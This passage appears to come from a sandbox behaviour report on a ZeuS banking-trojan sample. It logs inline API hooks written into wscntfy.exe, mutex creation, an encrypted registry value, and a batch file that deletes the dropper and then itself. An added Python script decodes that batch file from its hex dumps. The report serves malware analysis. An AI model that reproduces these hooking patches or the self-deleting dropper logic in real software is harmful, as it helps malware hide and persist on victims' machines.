Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2001932087
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 2001932376
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0001E Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001932737
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001933031
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA B4 3C success or wait 2001933365
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write Old Protection: page execute and write copy success or wait 2001933631
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy Old Protection: page execute and write copy success or wait 2001933926
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 5 Value: E9 97 45 1A C3 success or wait 2001934253
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 1000 New Protection: page execute read Old Protection: page execute and read and write success or wait 2001934563
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2001936027
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 2001936316
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00028 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001936670
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001936963
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE B5 3C success or wait 2001937295
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 19 C3 success or wait 2001938180
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 2001939414
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001940057
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 BB 3C success or wait 2001940388
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 13 C3 success or wait 2001941270
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 2001942495
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001943090
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 BB 3C success or wait 2001943423
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 13 C3 success or wait 2001944308
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 2001946488
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001947137
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 B4 3C success or wait 2001947471
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D949088 Length: 5 Value: E9 AD B1 1A C3 success or wait 2001948430
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 2001950692
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001951339
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 B4 3C success or wait 2001951674
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94654B Length: 5 Value: E9 2D DD 1A C3 success or wait 2001952558
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 2001954645
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001955295
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 B6 3C success or wait 2001955629
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D963381 Length: 5 Value: E9 36 0F 19 C3 success or wait 2001956509
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2001958713
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001959358
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF B4 3C success or wait 2001959692
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 1A C3 success or wait 2001960579
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 2001962792
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001963440
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 B4 3C success or wait 2001963775
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 1A C3 success or wait 2001964665
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2001965691
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001966340
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D CB 70 success or wait 2001966673
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2001968734
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001969601
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2001973201
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001973872
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2001976391
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001976989
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2001979511
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001980111
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2001982582
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001983177
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2001985638
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001986233
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2001988717
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001989405
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2001991880
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001992480
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2001994949
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001995544
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2001997774
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2001998371
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2002000834
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002001428
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2002003613
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002004209
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2002006713
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002007310
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 2002009771
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002010363
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002012790
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002013382
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002015844
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002016440
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 2002018922
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002019517
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002022518
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002025677
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002028985
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002032098
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002035120
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002038196
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002041278
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002044292
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002047385
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002050449
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002053463
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002056222
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002059280
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002062398
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002065433
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002068470
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002071482
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002074501
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002077502
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2002080541
System info queried Type: ProcessInformation success or wait 2002090533
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: E50000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2002097424
Thread created PID: 236 TID: 2508 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2002235694
Mutant created Name: \BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 2002237469
System info queried Type: ProcessInformation success or wait 2002238652
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: E90000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2002245461
Thread created PID: 236 TID: 2516 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2002386461
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2002387723
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2002388241
Mutant created Name: \BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 2002388986
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2002389327
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2002391355
+ Sections
+ General
Start time: 06:06:45
Start date: 01/12/2011
Path: C:\WINDOWS\system32\cmd.exe
Commandline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe read attributes and delete non directory file and open for backup ident and open reparse point success or wait 1 4AD17D07
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat read attributes and delete non directory file and open for backup ident and open reparse point success or wait 1 4AD17D07
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 1546EA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 4AD02F12
+ File read
File Path Offset Length Value Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 65 64 65 64 39 31 31 65 2E 62 61 74 22 0D 0A 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C success or wait 1 4AD069F8
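The five reads above are cmd.exe fetching tmpeded911e.bat one line at a time; decoded, they spell out the self-deletion loop behind the "Deletes itself after installation" signature. The script below is an added example, not part of the Joebox report. It reassembles the file from the dumped buffers copied from the rows above: because each read starts at the offset of the line cmd.exe is about to execute, it takes one line per read and checks that the rest of each 100-byte dump is confirmed by the next one. The last dump continues past the file's final CRLF with `" goto d`, CRLF, a NUL byte and `el /F "C:\DOCUME~1\ADMINI~1\`; that is consistent with leftover buffer content from the previous, longer read (with a NUL written at the end of the line cmd.exe had consumed) rather than with file content, so the reconstruction stops at the last line confirmed by the reads and reports the tail instead of decoding it as script.

```python
# The five "File read" dumps of tmpeded911e.bat, copied from this report
# (the logger copies out 100 bytes of the buffer whatever the read returned).
READS = [
    "40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66",
    "3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63",
    "64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34",
    "69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C",
    "64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 65 64 65 64 39 31 31 65 2E 62 61 74 22 0D 0A 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C",
]


def hex_dump_to_bytes(dump):
    """Turn a space-separated hex dump from the report into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def reconstruct_batch(chunks):
    """Rebuild a batch file from cmd.exe's per-line reads.

    cmd.exe re-reads the file from the offset of the line it is about to run,
    so every dumped buffer starts on a line boundary: take one line per read
    and check that the remainder of each buffer is confirmed by the next read.
    Returns (file_bytes, notes)."""
    lines, notes = [], []
    for i, chunk in enumerate(chunks):
        end = chunk.find(b"\r\n")
        if end < 0:
            notes.append(f"read {i}: no line terminator in the dump, taking it whole")
            end = len(chunk) - 2
        line, rest = chunk[:end + 2], chunk[end + 2:]
        lines.append(line)
        if i + 1 < len(chunks):
            nxt = chunks[i + 1]
            # the bytes after this line must be the start of the next read
            if not (nxt.startswith(rest) or rest.startswith(nxt)):
                notes.append(f"read {i}: bytes after the line disagree with read {i + 1}")
        elif rest:
            why = "contains NUL, likely residue from an earlier read" if b"\x00" in rest else "unconfirmed"
            notes.append(f"read {i}: {len(rest)} bytes after the last line ({why})")
    return b"".join(lines), notes


if __name__ == "__main__":
    script, notes = reconstruct_batch([hex_dump_to_bytes(r) for r in READS])
    print(script.decode("ascii", "replace"))
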